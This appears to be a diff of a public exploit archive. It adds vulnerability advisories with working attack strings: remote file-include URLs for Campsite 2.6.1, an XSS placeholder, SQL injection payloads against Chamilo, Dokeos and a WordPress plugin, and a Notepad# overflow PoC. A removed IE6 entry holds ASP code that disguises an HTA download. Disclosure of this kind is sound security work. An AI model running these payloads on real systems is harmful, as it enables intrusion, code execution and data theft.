source: http://www.securityfocus.com/bid/23873/info
Advanced Guestbook is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
This issue affects Advanced Guestbook 2.4.2; other versions may also be affected.
http://www.example.com/picture.php?size[0]=1&size[1]=1&img=1&picture=[xss]

9
platforms/php/webapps/29966.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/23874/info
Campsite is prone to multiple remote file-include vulnerabilities.
Exploiting this issue allows remote attackers to execute code in the context of the webserver.
This issue affects Campsite 2.6.1. Earlier versions may also be affected.
http://www.example.com/classes/Alias.php?g_DocumentRoot=shell.txt?

9
platforms/php/webapps/29967.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/23874/info
Campsite is prone to multiple remote file-include vulnerabilities.
Exploiting this issue allows remote attackers to execute code in the context of the webserver.
This issue affects Campsite 2.6.1. Earlier versions may also be affected.
http://www.example.com/classes/Article.php?g_DocumentRoot=shell.txt?

9
platforms/php/webapps/29968.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/23874/info
Campsite is prone to multiple remote file-include vulnerabilities.
Exploiting this issue allows remote attackers to execute code in the context of the webserver.
This issue affects Campsite 2.6.1. Earlier versions may also be affected.
http://www.example.com/classes/ArticleAttachment.php?g_DocumentRoot=shell.txt?

9
platforms/php/webapps/29969.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/23874/info
Campsite is prone to multiple remote file-include vulnerabilities.
Exploiting this issue allows remote attackers to execute code in the context of the webserver.
This issue affects Campsite 2.6.1. Earlier versions may also be affected.
http://www.example.com/classes/ArticleComment.php?g_DocumentRoot=shell.txt?

9
platforms/php/webapps/29970.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/23874/info
Campsite is prone to multiple remote file-include vulnerabilities.
Exploiting this issue allows remote attackers to execute code in the context of the webserver.
This issue affects Campsite 2.6.1. Earlier versions may also be affected.
http://www.example.com/classes/ArticleData.php?g_DocumentRoot=shell.txt?

9
platforms/php/webapps/29971.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/23874/info
Campsite is prone to multiple remote file-include vulnerabilities.
Exploiting this issue allows remote attackers to execute code in the context of the webserver.
This issue affects Campsite 2.6.1. Earlier versions may also be affected.
http://www.example.com/classes/ArticleImage.php?g_DocumentRoot=shell.txt?

9
platforms/php/webapps/29972.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/23874/info
Campsite is prone to multiple remote file-include vulnerabilities.
Exploiting this issue allows remote attackers to execute code in the context of the webserver.
This issue affects Campsite 2.6.1. Earlier versions may also be affected.
http://www.example.com/classes/ArticleIndex.php?g_DocumentRoot=shell.txt?

9
platforms/php/webapps/29973.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/23874/info
Campsite is prone to multiple remote file-include vulnerabilities.
Exploiting this issue allows remote attackers to execute code in the context of the webserver.
This issue affects Campsite 2.6.1. Earlier versions may also be affected.
http://www.example.com/classes/ArticlePublish.php?g_DocumentRoot=shell.txt?

9
platforms/php/webapps/29974.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/23874/info
Campsite is prone to multiple remote file-include vulnerabilities.
Exploiting this issue allows remote attackers to execute code in the context of the webserver.
This issue affects Campsite 2.6.1. Earlier versions may also be affected.
http://www.example.com/classes/ArticleTopic.php?g_DocumentRoot=shell.txt?

9
platforms/php/webapps/29975.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/23874/info
Campsite is prone to multiple remote file-include vulnerabilities.
Exploiting this issue allows remote attackers to execute code in the context of the webserver.
This issue affects Campsite 2.6.1. Earlier versions may also be affected.
http://www.example.com/classes/ArticleType.php?g_DocumentRoot=shell.txt?

9
platforms/php/webapps/29976.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/23874/info
Campsite is prone to multiple remote file-include vulnerabilities.
Exploiting this issue allows remote attackers to execute code in the context of the webserver.
This issue affects Campsite 2.6.1. Earlier versions may also be affected.
http://www.example.com/classes/ArticleTypeField.php?g_DocumentRoot=shell.txt?

9
platforms/php/webapps/29977.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/23874/info
Campsite is prone to multiple remote file-include vulnerabilities.
Exploiting this issue allows remote attackers to execute code in the context of the webserver.
This issue affects Campsite 2.6.1. Earlier versions may also be affected.
http://www.example.com/classes/Country.php?g_DocumentRoot=shell.txt?

9
platforms/php/webapps/29978.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/23874/info
Campsite is prone to multiple remote file-include vulnerabilities.
Exploiting this issue allows remote attackers to execute code in the context of the webserver.
This issue affects Campsite 2.6.1. Earlier versions may also be affected.
http://www.example.com/classes/DatabaseObject.php?g_DocumentRoot=shell.txt?

9
platforms/php/webapps/29979.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/23874/info
Campsite is prone to multiple remote file-include vulnerabilities.
Exploiting this issue allows remote attackers to execute code in the context of the webserver.
This issue affects Campsite 2.6.1. Earlier versions may also be affected.
http://www.example.com/classes/Event.php?g_DocumentRoot=shell.txt?

9
platforms/php/webapps/29980.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/23874/info
Campsite is prone to multiple remote file-include vulnerabilities.
Exploiting this issue allows remote attackers to execute code in the context of the webserver.
This issue affects Campsite 2.6.1. Earlier versions may also be affected.
http://www.example.com/classes/IPAccess.php?g_DocumentRoot=shell.txt?

9
platforms/php/webapps/29981.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/23874/info
Campsite is prone to multiple remote file-include vulnerabilities.
Exploiting this issue allows remote attackers to execute code in the context of the webserver.
This issue affects Campsite 2.6.1. Earlier versions may also be affected.
http://www.example.com/classes/Image.php?g_DocumentRoot=shell.txt?

9
platforms/php/webapps/29982.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/23874/info
Campsite is prone to multiple remote file-include vulnerabilities.
Exploiting this issue allows remote attackers to execute code in the context of the webserver.
This issue affects Campsite 2.6.1. Earlier versions may also be affected.
http://www.example.com/classes/Issue.php?g_DocumentRoot=shell.txt?

9
platforms/php/webapps/29983.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/23874/info
Campsite is prone to multiple remote file-include vulnerabilities.
Exploiting this issue allows remote attackers to execute code in the context of the webserver.
This issue affects Campsite 2.6.1. Earlier versions may also be affected.
http://www.example.com/classes/IssuePublish.php?g_DocumentRoot=shell.txt?

9
platforms/php/webapps/29984.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/23874/info
Campsite is prone to multiple remote file-include vulnerabilities.
Exploiting this issue allows remote attackers to execute code in the context of the webserver.
This issue affects Campsite 2.6.1. Earlier versions may also be affected.
http://www.example.com/classes/Language.php?g_DocumentRoot=shell.txt?

9
platforms/php/webapps/29985.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/23874/info
Campsite is prone to multiple remote file-include vulnerabilities.
Exploiting this issue allows remote attackers to execute code in the context of the webserver.
This issue affects Campsite 2.6.1. Earlier versions may also be affected.
http://www.example.com/classes/Log.php?g_DocumentRoot=shell.txt?

9
platforms/php/webapps/29986.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/23874/info
Campsite is prone to multiple remote file-include vulnerabilities.
Exploiting this issue allows remote attackers to execute code in the context of the webserver.
This issue affects Campsite 2.6.1. Earlier versions may also be affected.
http://www.example.com/classes/LoginAttempts.php?g_DocumentRoot=shell.txt?

9
platforms/php/webapps/29987.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/23874/info
Campsite is prone to multiple remote file-include vulnerabilities.
Exploiting this issue allows remote attackers to execute code in the context of the webserver.
This issue affects Campsite 2.6.1. Earlier versions may also be affected.
http://www.example.com/classes/Publication.php?g_DocumentRoot=shell.txt?

9
platforms/php/webapps/29988.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/23874/info
Campsite is prone to multiple remote file-include vulnerabilities.
Exploiting this issue allows remote attackers to execute code in the context of the webserver.
This issue affects Campsite 2.6.1. Earlier versions may also be affected.
http://www.example.com/classes/Section.php?g_DocumentRoot=shell.txt?

9
platforms/php/webapps/29989.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/23874/info
Campsite is prone to multiple remote file-include vulnerabilities.
Exploiting this issue allows remote attackers to execute code in the context of the webserver.
This issue affects Campsite 2.6.1. Earlier versions may also be affected.
http://www.example.com/classes/ShortURL.php?g_DocumentRoot=shell.txt?

9
platforms/php/webapps/29990.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/23874/info
Campsite is prone to multiple remote file-include vulnerabilities.
Exploiting this issue allows remote attackers to execute code in the context of the webserver.
This issue affects Campsite 2.6.1. Earlier versions may also be affected.
http://www.example.com/classes/Subscription.php?g_DocumentRoot=shell.txt?

9
platforms/php/webapps/29991.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/23874/info
Campsite is prone to multiple remote file-include vulnerabilities.
Exploiting this issue allows remote attackers to execute code in the context of the webserver.
This issue affects Campsite 2.6.1. Earlier versions may also be affected.
http://www.example.com/classes/SubscriptionDefaultTime.php?g_DocumentRoot=shell.txt?

9
platforms/php/webapps/29992.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/23874/info
Campsite is prone to multiple remote file-include vulnerabilities.
Exploiting this issue allows remote attackers to execute code in the context of the webserver.
This issue affects Campsite 2.6.1. Earlier versions may also be affected.
http://www.example.com/classes/SubscriptionSection.php?g_DocumentRoot=shell.txt?

9
platforms/php/webapps/29993.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/23874/info
Campsite is prone to multiple remote file-include vulnerabilities.
Exploiting this issue allows remote attackers to execute code in the context of the webserver.
This issue affects Campsite 2.6.1. Earlier versions may also be affected.
http://www.example.com/classes/SystemPref.php?g_DocumentRoot=shell.txt?

9
platforms/php/webapps/29994.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/23874/info
Campsite is prone to multiple remote file-include vulnerabilities.
Exploiting this issue allows remote attackers to execute code in the context of the webserver.
This issue affects Campsite 2.6.1. Earlier versions may also be affected.
http://www.example.com/classes/Template.php?g_DocumentRoot=shell.txt?

9
platforms/php/webapps/29995.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/23874/info
Campsite is prone to multiple remote file-include vulnerabilities.
Exploiting this issue allows remote attackers to execute code in the context of the webserver.
This issue affects Campsite 2.6.1. Earlier versions may also be affected.
http://www.example.com/classes/TimeUnit.php?g_DocumentRoot=shell.txt?

9
platforms/php/webapps/29996.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/23874/info
Campsite is prone to multiple remote file-include vulnerabilities.
Exploiting this issue allows remote attackers to execute code in the context of the webserver.
This issue affects Campsite 2.6.1. Earlier versions may also be affected.
http://www.example.com/classes/Topic.php?g_DocumentRoot=shell.txt?

9
platforms/php/webapps/29997.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/23874/info
Campsite is prone to multiple remote file-include vulnerabilities.
Exploiting this issue allows remote attackers to execute code in the context of the webserver.
This issue affects Campsite 2.6.1. Earlier versions may also be affected.
http://www.example.com/classes/UrlType.php?g_DocumentRoot=shell.txt?

10
platforms/php/webapps/29998.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/23874/info
Campsite is prone to multiple remote file-include vulnerabilities.
Exploiting this issue allows remote attackers to execute code in the context of the webserver.
This issue affects Campsite 2.6.1. Earlier versions may also be affected.
http://www.example.com/classes/User.php?g_DocumentRoot=shell.txt?

9
platforms/php/webapps/29999.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/23874/info
Campsite is prone to multiple remote file-include vulnerabilities.
Exploiting this issue allows remote attackers to execute code in the context of the webserver.
This issue affects Campsite 2.6.1. Earlier versions may also be affected.
http://www.example.com/classes/UserType.php?g_DocumentRoot=shell.txt?

28
platforms/php/webapps/30002.txt Executable file
View file

@ -0,0 +1,28 @@
#######################################################################
# Exploit Title : Wordpress formcraft Plugin Sql Injection
#
# Exploit Author : Ashiyane Digital Security Team
#
# Google Dork : inurl:/wp-content/plugins/formcraft
#
# Software Link : www.wordpress.org
#
# Tested on: Windows , Linux
#
# Date: 2013/12/2
#
#############################################
# Exploit : Sql Injection
#
# Location1:
[Target]/wp-content/plugins/formcraft/form.php?id=[Sql]
#
#
#
##########################################
##############
Milad Hacking
We Love Mohammad
##############

9
platforms/php/webapps/30003.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/23874/info
Campsite is prone to multiple remote file-include vulnerabilities.
Exploiting this issue allows remote attackers to execute code in the context of the webserver.
This issue affects Campsite 2.6.1. Earlier versions may also be affected.
http://www.example.com/configuration.php?g_DocumentRoot=shell.txt?

9
platforms/php/webapps/30004.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/23874/info
Campsite is prone to multiple remote file-include vulnerabilities.
Exploiting this issue allows remote attackers to execute code in the context of the webserver.
This issue affects Campsite 2.6.1. Earlier versions may also be affected.
http://www.example.com/db_connect.php?g_DocumentRoot=shell.txt?

9
platforms/php/webapps/30005.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/23874/info
Campsite is prone to multiple remote file-include vulnerabilities.
Exploiting this issue allows remote attackers to execute code in the context of the webserver.
This issue affects Campsite 2.6.1. Earlier versions may also be affected.
http://www.example.com/priv/localizer/LocalizerConfig.php?g_DocumentRoot=shell.txt?

9
platforms/php/webapps/30006.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/23874/info
Campsite is prone to multiple remote file-include vulnerabilities.
Exploiting this issue allows remote attackers to execute code in the context of the webserver.
This issue affects Campsite 2.6.1. Earlier versions may also be affected.
http://www.example.com/priv/localizer/LocalizerLanguage.php?g_DocumentRoot=shell.txt?

73
platforms/php/webapps/30012.txt Executable file
View file

@ -0,0 +1,73 @@
Advisory ID: HTB23182
Product: Chamilo LMS
Vendor: Chamilo Association
Vulnerable Version(s): 1.9.6 and probably prior
Tested Version: 1.9.6
Advisory Publication: November 6, 2013 [without technical details]
Vendor Notification: November 6, 2013
Vendor Patch: November 9, 2013
Public Disclosure: November 27, 2013
Vulnerability Type: SQL Injection [CWE-89]
CVE Reference: CVE-2013-6787
Risk Level: Medium
CVSSv2 Base Score: 6 (AV:N/AC:M/Au:S/C:P/I:P/A:P)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )
-----------------------------------------------------------------------------------------------
Advisory Details:
High-Tech Bridge Security Research Lab discovered vulnerability in Chamilo LMS, which can be exploited to perform SQL Injection attacks.
1) SQL Injection in Chamilo LMS: CVE-2013-6787
The vulnerability exists due to insufficient validation of "password0" HTTP POST parameter passed to "/main/auth/profile.php" script. A remote authenticated attacker can execute arbitrary SQL commands in application's database.
The following exploitation example displays version of MySQL server:
<form action="http://[host]/main/auth/profile.php" method="post" name="main">
<input type="hidden" name="password0" value="' OR substring(version(),1,1)=5 -- ">
<input type="hidden" name="password1" value="password">
<input type="hidden" name="password2" value="password">
<input type="hidden" name="apply_change" value="">
<input type="hidden" name="firstname" value="first_name">
<input type="hidden" name="lastname" value="last_name">
<input type="hidden" name="username" value="username">
<input type="hidden" name="official_code" value="USER">
<input type="hidden" name="phone" value="">
<input type="hidden" name="language" value="">
<input type="hidden" name="extra_mail_notify_invitation" value="">
<input type="hidden" name="extra_mail_notify_message" value="">
<input type="hidden" name="extra_mail_notify_group_message" value="">
<input type="hidden" name="_qf__profile" value="">
<input type="hidden" name="" value="">
<input type="submit" id="btn">
</form>
Successful exploitation of this vulnerability requires that the application is configured during installation not to encrypt users' passwords ("Encryption method" option is set to "none").
-----------------------------------------------------------------------------------------------
Solution:
Edit the source code and apply changes according to vendor's instructions:.
More Information:
https://support.chamilo.org/projects/chamilo-18/wiki/Security_issues#Issue-10-2013-11-06-Moderate-risk-SQL-Injection-in-specific-unrecommended-case
-----------------------------------------------------------------------------------------------
References:
[1] High-Tech Bridge Advisory HTB23182 - https://www.htbridge.com/advisory/HTB23182 - SQL Injection in Chamilo LMS.
[2] Chamilo LMS - http://www.chamilo.org/ - Chamilo aims at bringing you the best e-learning and collaboration platform in the open source world.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® - http://www.htbridge.com/immuniweb/ - is High-Tech Bridge's proprietary web application security assessment solution with SaaS delivery model that combines manual and automated vulnerability testing.
-----------------------------------------------------------------------------------------------
Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.

51
platforms/php/webapps/30013.txt Executable file
View file

@ -0,0 +1,51 @@
Advisory ID: HTB23181
Product: Dokeos
Vendor: Dokeos
Vulnerable Version(s): 2.2 RC2 and probably prior
Tested Version: 2.2 RC2
Advisory Publication: October 30, 2013 [without technical details]
Vendor Notification: October 30, 2013
Public Disclosure: November 27, 2013
Vulnerability Type: SQL Injection [CWE-89]
CVE Reference: CVE-2013-6341
Risk Level: High
CVSSv2 Base Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
Solution Status: Solution Available
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )
-----------------------------------------------------------------------------------------------
Advisory Details:
High-Tech Bridge Security Research Lab discovered vulnerability in Dokeos, which can be exploited to perform SQL Injection attacks.
1) SQL Injection in Dokeos: CVE-2013-6341
The vulnerability exists due to insufficient validation of "language" HTTP GET parameter passed to "/index.php" script. A remote unauthenticated attacker can execute arbitrary SQL commands in application's database and gain complete control over the vulnerable web application.
The following exploitation example displays version of MySQL server:
http://[host]/index.php?language=0%27%20UNION%20SELECT%201,2,3,4,version%28%29,6,7,8%20--%202
-----------------------------------------------------------------------------------------------
Solution:
Vendor did not reply to 6 notifications by email, 1 notification via twitter, 2 forum threads/direct messages. Currently we are not aware of any official solution for this vulnerability.
Unofficial patch was developed by High-Tech Bridge Security Research Lab and is available here: https://www.htbridge.com/advisory/HTB23181-patch.zip
-----------------------------------------------------------------------------------------------
References:
[1] High-Tech Bridge Advisory HTB23181 - https://www.htbridge.com/advisory/HTB23181 - SQL Injection in Dokeos.
[2] Dokeos - http://www.dokeos.com/ - Dokeos, the flexible, enterprise-ready e-learning software.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® - http://www.htbridge.com/immuniweb/ - is High-Tech Bridge's proprietary web application security assessment solution with SaaS delivery model that combines manual and automated vulnerability testing.
-----------------------------------------------------------------------------------------------
Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.

35
platforms/windows/local/30007.txt Executable file
View file

@ -0,0 +1,35 @@
# Exploit Title: Notepad++ - Notepad# plugin local exploit
# Google Dork:
# Date: 2013-12-01
# Exploit Author: Sun Junwen
# Vendor Homepage: http://notepad-plus-plus.org/
# Software Link: http://notepad-plus-plus.org/download/
# Version: Notepad ++ 6.3.2 with Notepad# plugin (1.5) and Explorer plugin
(1.8.2)
# Tested on: Windows XP SP3 EN
# CVE :
1. Poc
With Notepad# plugin (1.5) and Explorer plugin (1.8.2) installed in Notepad
++ 6.3.2, open the html file in attachement, click Enter in the last
</script> tag, Npp will crash and calc.exe will open. Without Explorer
plugin, these still can be exploit. Explorer plugin makes this easier.
2. Root cause
NotepadSharp plugin has several stack buffer overflow bug.
In its PluginDefinition.cpp file, there are some char buffer whose length
are 9999. They are all defined on stack.
So if some strcpy/memcpy copy more than 9999 chars to these buffers, it
leads to a stack overflow.
3. Tested on
Windows XP SP3 EN
Notepad ++ 6.3.2
Notepad# plugin (1.5) and Explorer plugin (1.8.2)
Sun Junwen
Trendmicro, CDC
Exploit: http://www.exploit-db.com/sploits/30007.zip

1230
platforms/windows/remote/29510.txt
View file

File diff suppressed because it is too large Load diff

420
platforms/windows/remote/29511.txt
View file

@ -1,420 +0,0 @@
-Introduction-
Microsoft Internet Explorer is the default webbrowser on Windows
operating systems.
Vendor link: http://www.microsoft.com
IE link: http://windows.microsoft.com/en-us/internet-explorer/browser-ie
Vulnerable version: Internet Explorer 6 on Windows XP SP3 and Windows
Server 2003 (on Win 2003 it only works without the enhanced IE mode)
and also below OS versions (not supported by Microsoft anymore) like
Windows 2000, 98, ME.
Author/Discoverer: Eduardo Prado http://secumania.info Security Group
- The vulnerability-
IE 6 contains a vulnerability that allows malicious users to spoof the
file extension presented in the file download dialog.
The file download dialog presents only the "Save" button to the user.
When the file is saved to disk an unsafe extension
such as ".HTA" is appended to the file. HTA fIles allows execution of
arbitrary code in the system.
See the proof of concept for demonstration.
Successfully tested on IE 6 on a fully patched Windows XP SP3.
=========================PIC-download.asp========================================================
<%
'--------------------------------------------
Response.Buffer = True
Dim strFilePath, strFileSize, strFileName
Const adTypeBinary = 1
strFilePath = "C:\webroot\PICTURE YOU WILL FIND SO AMAZING4. JPG "
strFileName = "PICTURE YOU WILL FIND SO AMAZING4. JPG "
strFileSize = 5000
Response.Clear
'8*******************************8
' Requires MDAC 2.5 to be stable
' I recommend MDAC 2.6 or 2.7
'8*******************************8
Set objStream = Server.CreateObject("ADODB.Stream")
objStream.Open
objStream.Type = adTypeBinary
objStream.LoadFromFile strFilePath
strFileType = lcase(Right(strFileName, 4))
' Feel Free to Add Your Own Content-Types Here
Select Case strFileType
Case ". JPEG "
ContentType = "application/hta"
Case Else
'Handle All Other Files
ContentType = "application/hta"
End Select
Response.AddHeader "X-Download-Options", "noopen"
Response.AddHeader "Content-Disposition", "attachment; filename=" &
strFileName
'Response.AddHeader "Content-Length", strFileSize
' In a Perfect World, Your Client would also have UTF-8 as the default
' In Their Browser
Response.Charset = "UTF-8"
'for only displaying the "Save" button in the file download prompt. use
"nosave" to only display the "open" button.
Response.ContentType = ContentType
Response.BinaryWrite objStream.Read
Response.Flush
objStream.Close
Set objStream = Nothing
%>
==========eof====================================================================================
===========================PICTURE YOU WILL FIND SO AMAZING.JPEG (Base64
encoded)===================
P18DAIUDAAD/////NkQAAHUDAABsAwAAAAAlXFwsLjo6LwBhQWNlc3NvYQEFQGx1aWFkZXEAdWFk
YWFkaWNAaW9uYWlzCVByEGFmZXQZAHNBasJ1HwBwbGljDSAIICJyDyDhdmUvAHByEG9wcmkvAHJx
dUBpdm9hc2FiAGMBWQBhYXRyaWJ1FGlyBzDtSwBhdHUAYWxhdWRpdG8hMgBjYWl4BDBzYwBhbmNl
bGFuZABvY2VydGlmaQBxdWUtc2VjaCRtY28gQ2wREGNvEm0CAHB1lwBvcmMAb25maWd1cmEQ5/Vl
cwwAc3VsCHRlZAEAZmluaWW3AGQVAHJpHBAJAGUGaukABRByRGVzbfxhcssAB1ApIBIgfQAVUB5y
HjCFAEYAVhB0YWwCaCsgaeFsb2dvEGRvZWXFAGFyZQElAWl2YXNlbWWYbnRySQEGQHNFB0ABmxBs
aGVyRXNwZGVj2ABjYYIBAxBlQ1gQXABpdmVyYwDjAG9FWEUnZXhp4GJpcmV4bhFeAFQQAc8AbGhv
Z3J1cEEEMHNoZWxwUABhaG7nYVcAZL0BBkBzCkgOEHIUIHLhaHQAbSdpZOpudGkgY29zSW7tAe0t
YGxhc2lu6gHXEWkgbmZvcm09IUxpgnPfAG9jYWxtAQIBADFNUy1JVFNuAGFuZWdhcm7jgG9vb2Jq
ZXQFQEBzb2J0ZXIGAHUwcGFpUA4SEhJlcsBtaXNz428IQJYBhlAJYBwgdGlycGIBUFByb2O3AXI5
MmWgdOFyaW+FAmzzATJyv0Fycg0CWCFzYRhnX1P5AR8CcHRziFVuT4YAY3RT0gGYc2VsUQG0AmRv
CmACchQQ5+Nvc2lnzm5sIakAXQFvbQUAzBIJCGBzedYBbXJvbwJ0sAB1bXVtYXVMc3WIEAZAc1UH
QFaQb2PqdgMA6ni0AoAoYCksYDE6TwNwYW9hb/sCDDP4AkH4c0F2kRHAAk4DtAKuMhxvQwMAqQJJ
I2RldrhlRUYxAv4CVQJh7CGBYQNmYXplcmbsAiEaIGFmb2mZAWVtJGhhGQJISFIBb2x3oBGuQrVS
TZ4ipDJ8Am8Mc23ZAsIDc29uZKBlcGFkcogBYdcBGnBXA1DYAnkRbXBvs6UD5QNRdWsTEwFssgBA
YVJlbW92JCNtIcgCc2Vy4QMA428AdGVuaGFtdGUAcnRpcG90b2QAb3N2ZXLg6S8EAAAmBAAABDsp
AgQABHo0AAAAAAAAAAAAAAAAAAAAAAAAAAD//wEAAQAPAAAATgMPAP////98Q0YwALlDAAB8Q0Yx
ANJDAAB8Q0YyAOtDAAB8Q0Y0AAREAAB8Q0Y1AB1EAAB8Q09OVEVYVAAsKwAAfENUWE9NQVAA0iEA
AHxGT05UAEohAAB8UGV0cmEAWzMAAHxQaHJJbWFnZQAQAAAAfFBockluZGV4ALQHAAB8U1lTVEVN
AFUIAAB8VE9QSUMAzgsAAHxUVExCVFJFRQD9IgAAfFRvcGljSWQAijsAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAKEAAACYAAAAAAEAAAC9AAAAgAAAAE4E
AABsAwAAAAAAAKMXAEoEQKCKXoJj4BJYghcMqCWSKpXoEoqypxQCFhZQF3b3YmaMphVRjdmVLZSQ
EE1VkEAZRcgslOLmzSiEVSQVDhhKISF2N0MBAREhNnFTMyQTNUdEQhRDdlVEMkUzJFRXJEMlQwIA
8P///////////////////8j///////8feQMAAHADAAAAbAMhAAEAOwtjOwQAAQALAEVkaXRvciBB
Q0wAAwAEAAAAAAACACEAU2F0dXJkYXksIEp1bHkgMjgsIDIwMDEgMTU6NTg6MDMABAAFAENTKCkA
BAAFAENTKCkABgBaAH8PAAAAAAAAAAAAAHByb2M0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAI0CZgBoAVgCBAD//+IAwMDAAAYAWgB/DwAAAAAA
AAAAAAB0cm91YmxlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAACNAmYAaAFYAgQA///iAMDAwAAGAFoAfxsAAAAAAAAAAAAAYmlnAAAAAAAAAAAAAAAA
